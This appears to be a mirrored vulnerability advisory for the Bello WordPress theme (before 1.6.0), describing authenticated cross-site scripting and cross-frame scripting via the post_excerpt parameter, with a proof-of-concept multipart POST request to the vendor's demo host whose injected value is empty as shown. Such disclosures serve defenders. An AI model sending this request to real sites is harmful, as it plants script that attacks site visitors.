Lucene search
M0zeWPVDB-ID:2C274EB7-25F1-49D4-A2C8-8CE8CECEBE68HistoryMay 16, 2021 - 12:00 a.m.
Bello < 1.6.0 - Authenticated Cross-Site Scripting (XSS) and XFS
2021-05-1600:00:00
m0ze
wpscan.com
8
0.001 Low
EPSS
Percentile
21.9%
The theme did not properly sanitise its post_excerpt parameter before outputting it back in the shop/my-account/bello-listing-endpoint/ page, leading to a Cross-Site Scripting issue
PoC
– [ Payloads: ] [$] ### – [ PoC | Authenticated XFS | My Listings: ] [!] POST /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat;=115 HTTP/1.1 Host: bello.bold-themes.com User-Agent: Mozilla/5.0 Content-Type: multipart/form-data; boundary=---------------------------16118302073611242382926219402 Content-Length: 13779 Referer: https://bello.bold-themes.com/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat;=115 Cookie: [user cookies] -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“action” ajax_submit -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“rwmb_form_config” 5d63602a0e2f80c83196bc5ea6405fca -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“post_title” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“post_content” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“post_excerpt” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“_thumbnail_id” 7316 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“_thumbnail_id” 7316 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“nonce_listing_cf” e1c3b088fu -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“_wp_http_referer” /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat;=115 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-location_position” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-region” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-price_from” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-price_to” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-price_free” 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[0][start]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[0][end]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[0][start2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[0][end2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[1][start]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[1][end]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[1][start2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[1][end2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[2][start]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[2][end]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[2][start2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[2][end2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[3][start]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[3][end]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[3][start2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[3][end2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[4][start]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[4][end]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[4][start2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[4][end2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[5][start]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[5][end]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[5][start2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[5][end2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[6][start]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[6][end]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[6][start2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-working_time[6][end2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-contact_address” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-contact_phone” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-contact_mobile” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-contact_email” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-contact_website” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-contact_price” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-contact_description” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-social_facebook” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-social_twitter” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-social_instagram” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-social_google_plus” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-social_pinterest” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-social_tripadvisor” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-social_youtube” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-faq” 13 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-amenities_free_wifi” 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-amenities_air_conditioned” 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_images_featured” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_images_exterior” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_images_interior” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_images_pools” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_images_beach” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_images_spa” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_audio_sound” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_video_1” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_video_2” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_video_3” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-media_audio_1” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-timekit[0]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-timekit[1]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-timekit[2]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-timekit[3]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-timekit[4]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-timekit[5]” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-bello-listing-package” bello-default-package -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-contact_form_email” -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-amenities_hostel_restaurant” 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-amenities_hostel_non_smoking_rooms” 1 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-category-115[]” 49 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“boldthemes_theme_listing-category-115[]” 115 -----------------------------16118302073611242382926219402 Content-Disposition: form-data; name=“rwmb_submit” 1 -----------------------------16118302073611242382926219402–
Related
cvelist
cvelist
prion
prion
Cross site scripting
2021-06-01 14:15:00
nvd
nvd
CVE-2021-24319
2021-06-01 14:15:09
cve
cve
CVE-2021-24319
2021-06-01 14:15:09
wpexploit
wpexploit
Bello < 1.6.0 - Authenticated Cross-Site Scripting (XSS) and XFS
2021-05-16 00:00:00